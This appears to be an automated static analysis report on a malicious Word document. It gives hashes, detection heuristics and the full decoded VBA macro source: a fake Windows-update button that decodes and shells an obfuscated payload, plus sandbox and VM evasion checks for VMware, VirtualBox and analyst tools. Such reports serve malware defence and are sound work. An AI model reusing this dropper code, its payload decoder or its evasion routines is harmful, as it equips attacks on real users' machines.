Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61d5a5aa0346e201…

MALICIOUS

Office (OLE)

Size: 166.0 KB
Created: 2017-10-19 16:29:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: c4d7cdc3685d094d5d45f772e92534ae
SHA-1: 12b17ab1c4099c00ee7d39d904b5d744e4a2d022
SHA-256: 61d5a5aa0346e20127ba663cc611acc412993dea3d12e468f4fcc9b663792432
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The document body attempts to trick the user into clicking a button labeled 'Mise à jour de la station de travail Windows' (Windows workstation update). Upon clicking, the VBA macro executes cmd.exe, as indicated by multiple heuristics including OLE_VBA_SHELL and OLE_VBA_CMD. The macro's intent is to download and execute a second-stage payload, though the specific payload and download mechanism are obfuscated and truncated.

Heuristics (10)

  • ClamAV: Doc.Dropper.Agent-6364326-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6364326-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 5 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Matched line in script
    JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
    Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
        Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched line in script
        If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    Matched line in script
        tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
        Set ws = GetObject("winmgmts:\\.\root\cimv2")
  • cmd.exe reference in VBA (severity: high; rule: OLE_VBA_CMD)
    Matched line in script
    Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
        Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
  • Environ() call (env variable access) (severity: low; rule: OLE_VBA_ENVIRON)
    Matched line in script
        Dim userDomain As String
        userDomain = Environ$("userdomain")
  • Suspicious cmd.exe invocation with execution flag (severity: high; rule: SC_STR_CMD)
  • Suspicious extracted artifact (severity: high; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 44648 bytes
SHA-256: 91c6cdef2d838a65a14af479a16554fc3c73808673b588b19f9ffc2bf9619b75
Detection: ClamAV: No threats found
Obfuscation or payload: likely
185 of 367 identifiers look randomly generated (e.g. 'dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3Ikd') — consistent with name-mangling obfuscation. Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mise_a_jour_de_la_station_de_travail1, 0, 0, MSForms, CommandButton"
Private Sub Mise_a_jour_de_la_station_de_travail1_Click()
    Call mise_a_jour_windows
End Sub

Attribute VB_Name = "Module1"

Sub mise_a_jour_windows()
    On Error Resume Next

    'If checkRecentDocs Then
        'MsgBox ("1")
        'Exit Sub
    'End If
    
    'If checkNbrOfTask Then
        'MsgBox ("2")
        'Exit Sub
   ' End If
    
    'If Not checkTasks Then
        'Exit Sub
    'End If
    
    'checkZoneIdentifier
    
    'checkPartOfDomain
    
    'If checkBios Then
        ''MsgBox ("3")
        'Exit Sub
   ' End If
    
    'If checkPnP Then
        'MsgBox ("4")
        'Exit Sub
    'End If
    
    'If checkUsername Then
        'MsgBox ("5")
        'Exit Sub
    'End If
    
    'If checkFilenameHash Then
        'MsgBox ("6")
        'Exit Sub
   ' End If
    
    'If checkFilenameBad Then
        'Exit Sub
    'End If
    
    'checkPreciseFileName
    
    'checkCores

    'If checkAppCount Then
        'Exit Sub
   ' End If
    
    'If checkApps Then
        'Exit Sub
    'End If
    
    'If verifyPreciseDomain Then
        'Exit Sub
    'End If

Dim JSYKsfbkulFLwzF As String
Dim EKKdVAjzttW As String
Dim cTdzQWOUWEEVexjiF As String
Dim TkvnhzpvknoLxyTmn As String
Dim fXhXNVEleO As String
Dim NJqYJJYErv As String
Dim hDXThtgUsEh As String
Dim rkqdOMkxmnSp As String
Dim WauMdbKKmxueesFlTRlH As String
Dim wxpLHjNnjVZ As String
Dim pUCAotjVuCQBfkftGrwC As String
Dim FhnDRjyhZREVMT As String
cTdzQWOUWEEVexjiF = "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbzeKtlPbY1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
TkvnhzpvknoLxyTmn = "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7eUlsDJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
fXhXNVEleO = "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUHamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
NJqYJJYErv = "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
hDXThtgUsEh = "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
rkqdOMkxmnSp = "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
WauMdbKKmxueesFlTRlH = "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
wxpLHjNnjVZ = "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3Sdelsce=zftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
pUCAotjVuCQBfkftGrwC = "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33V3gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
FhnDRjyhZREVMT = "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+kxf1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
EKKdVAjzttW = cTdzQWOUWEEVexjiF + TkvnhzpvknoLxyTmn + fXhXNVEleO + NJqYJJYErv + hDXThtgUsEh + rkqdOMkxmnSp + WauMdbKKmxueesFlTRlH + wxpLHjNnjVZ + pUCAotjVuCQBfkftGrwC + FhnDRjyhZREVMT
JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
    Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)

End Sub

Public Function checkApps() As Boolean

    
    d = False
    tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
    Set ws = GetObject("winmgmts:\\.\root\cimv2")
    
    Dim names() As String
    ReDim names(WordBasic.AppCount())
    
    WordBasic.AppGetNames names
    
    For Each n In names
        For Each tn In tns
            If InStr(LCase(n), tn) > 0 Then
                d = True
            End If
        Next
    Next

    If d Then
    
        checkApps = True
        
    Else
    
        checkApps = False
    End If
    
End Function

Public Function checkAppCount() As Boolean

    If WordBasic.AppCount() < 50 Then
    
        checkAppCount = True
        
    Else
    
        checkAppCount = False
    End If
    
End Function

Public Function checkPreciseFileName() As Boolean

    
    badName = False

  
    If ActiveDocument.Name <> "Pafish.docm" Then
            badName = True
    End If
 
    If badName Then
        
        checkPreciseFileName = True
    Else
        
        checkPreciseFileName = False
    End If
    
End Function

Public Function checkFilenameHash() As Boolean

    
    hexchars = "0123456789abcdef"
    
    c = 0
    
    For i = 1 To Len(ThisDocument.Name)
        s = Mid(LCase(ThisDocument.Name), i, 1)
        
        If InStr(s, hexchars) > 0 Then
            c = c + 1
        End If
        
    Next
    
    If c >= (Len(ThisDocument.Name) - 5) Then
        checkFilenameHash = True
        
    Else
    
    
        checkFilenameHash = False
    End If
    
End Function

Public Function checkFilenameBad() As Boolean

    
    badName = False
    badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")

    
    For Each n In badNames
        If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
            badName = True
        End If
    Next
 

    If badName Then
        
        checkFilenameBad = True
    Else
        
        checkFilenameBad = False
    End If
    
End Function

Public Function checkTasks() As Boolean


    badTask = False
    badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
    
    For Each Task In Application.Tasks
    
        For Each badTaskName In badTaskNames
            If InStr(LCase(Task.Name), badTaskName) > 0 Then
                badTask = True
            End If
        Next
        
    Next

    If badTask Then
        
         checkTasks = True
    Else
        
         checkTasks = False
    End If
    
End Function

Public Function checkCores() As Boolean


    badCores = 0

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
    
    For Each objItem In colItems
    
            If objItem.NumberOfCores < 3 Then
                badCores = True
            End If
        
    Next

    If badCores Then
        
        printMsg "DETECTED"
    Else
        
        printMsg "OK"
    End If
    
End Function

Public Function checkBios() As Boolean


    badBios = False
    badBiosNames = Array("virtualbox", "vmware", "kvm")
    
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
    
    For Each objItem In colItems
    
        For Each badName In badBiosNames
            If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
                badBios = True
            End If
            If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
                badBios = True
            End If
        Next
        
    Next

    If badBios Then
        
        checkBios = True
    Else
        
        checkBios = False
    End If
    
End Function

Public Function checkPnP() As Boolean


    badPNP = False
    badPNPNames = Array("VEN_80EE", "VEN_15AD")
    
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
    
    For Each objItem In colItems
    
        For Each badName In badPNPNames
            If InStr(LCase(objItem.DeviceId), badName) > 0 Then
                badPNP = True
            End If
        Next
        
    Next

    If badPNP Then
        
        checkPnP = True
    Else
        
        checkPnP = False
    End If
    
End Function

Public Function checkUsername() As Boolean


    badUsername = False
    badUsernames = Array("admin", "malfind", "sandbox", "test")
    
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
    
    For Each objItem In colItems
    
        For Each badName In badUsernames
            If InStr(LCase(objItem.UserName), badName) > 0 Then
                badUsername = True
            End If
        Next
        
    Next

    If badUsername Then
        
        checkUsername = True
    Else
        
        checkUsername = False
    End If
    
End Function

Public Function verifyPreciseDomain() As Boolean

    Dim domainToCheck As String
    domainToCheck = "saturne"
    Dim userDomain As String
    userDomain = Environ$("userdomain")
    
    If InStr(LCase(userDomain), LCase(domainToCheck)) Then
        verifyPreciseDomain = False
    Else
        verifyPreciseDomain = True
    End If
End

End Function

Public Function checkPartOfDomain() As Boolean


    partOfDomain = False
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
    
    For Each objItem In colItems
        If objItem.partOfDomain Then
            partOfDomain = True
        End If
    Next

    If partOfDomain Then
        checkPartOfDomain = True
        
    Else
        checkPartOfDomain = False
    End If
    
End Function

Public Function checkZoneIdentifier() As Boolean


    If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
    
        checkZoneIdentifier = True
        
    Else
    
        checkZoneIdentifier = False
    End If
    
End Function

Public Function checkNbrOfTask() As Boolean


    If Application.Tasks.Count < 3 Then
    
        checkNbrOfTask = True
        
    Else
    
        checkNbrOfTask = False
    End If
    
End Function

Public Function checkRecentDocs() As Boolean

    If Application.RecentFiles.Count < 3 Then
    
        checkRecentDocs = True
        
    Else
    
        checkRecentDocs = False
    End If
    
End Function

Function HdrROagFHcClGMFzo(nKyaisQnDvP As String, ujNHJbTOMZBY As String) As String
Dim vCqgDvGgcYPFSLbAf As String
Dim VTZNPWtRsKVgfWAZHCG As Long
Dim rRDeLadOxzqFpBBe As Long
Dim fCIvqJuUQOrDpoAFFD As Long
HdrROagFHcClGMFzo = ""
vCqgDvGgcYPFSLbAf = "2/q0V8ZF=1BMa7YcLztpnTWhRNsSUg65wexEDOuomAP3X4lrkKGvIy9iQJjbHdfC+"
rRDeLadOxzqFpBBe = 1
For VTZNPWtRsKVgfWAZHCG = 1 To Len(nKyaisQnDvP)
fCIvqJuUQOrDpoAFFD = InStr(vCqgDvGgcYPFSLbAf, Mid(nKyaisQnDvP, VTZNPWtRsKVgfWAZHCG, 1)) - 1
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD - (InStr(vCqgDvGgcYPFSLbAf, Mid(ujNHJbTOMZBY, rRDeLadOxzqFpBBe, 1)) - 1)
fCIvqJuUQOrDpoAFFD = (fCIvqJuUQOrDpoAFFD Mod 65)
If (fCIvqJuUQOrDpoAFFD < 0) Then
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 65
End If
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 1
HdrROagFHcClGMFzo = HdrROagFHcClGMFzo & Mid(vCqgDvGgcYPFSLbAf, fCIvqJuUQOrDpoAFFD, 1)
rRDeLadOxzqFpBBe = rRDeLadOxzqFpBBe + 1
If rRDeLadOxzqFpBBe > Len(ujNHJbTOMZBY) Then
rRDeLadOxzqFpBBe = 1
End If
Next VTZNPWtRsKVgfWAZHCG
End Function

Function YMxlfeXoQkyCchX(ByVal QdlDIrNTjASyeN As String) As Byte()
Dim JUiNmNdoJmWQkzCgPNyp As Object
Dim ilCuylucYGMVsPGKnYyE As Object
Set JUiNmNdoJmWQkzCgPNyp = CreateObject("MSXML2.DOMDocument")
Set ilCuylucYGMVsPGKnYyE = JUiNmNdoJmWQkzCgPNyp.createElement("b64")
ilCuylucYGMVsPGKnYyE.DataType = "bin.base64"
ilCuylucYGMVsPGKnYyE.Text = QdlDIrNTjASyeN
YMxlfeXoQkyCchX = ilCuylucYGMVsPGKnYyE.nodeTypedValue
Set ilCuylucYGMVsPGKnYyE = Nothing
Set JUiNmNdoJmWQkzCgPNyp = Nothing
End Function

' Processing file: /tmp/qstore_3kh5l398
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5357 bytes
' Macros/VBA/Module1 - 40706 bytes
…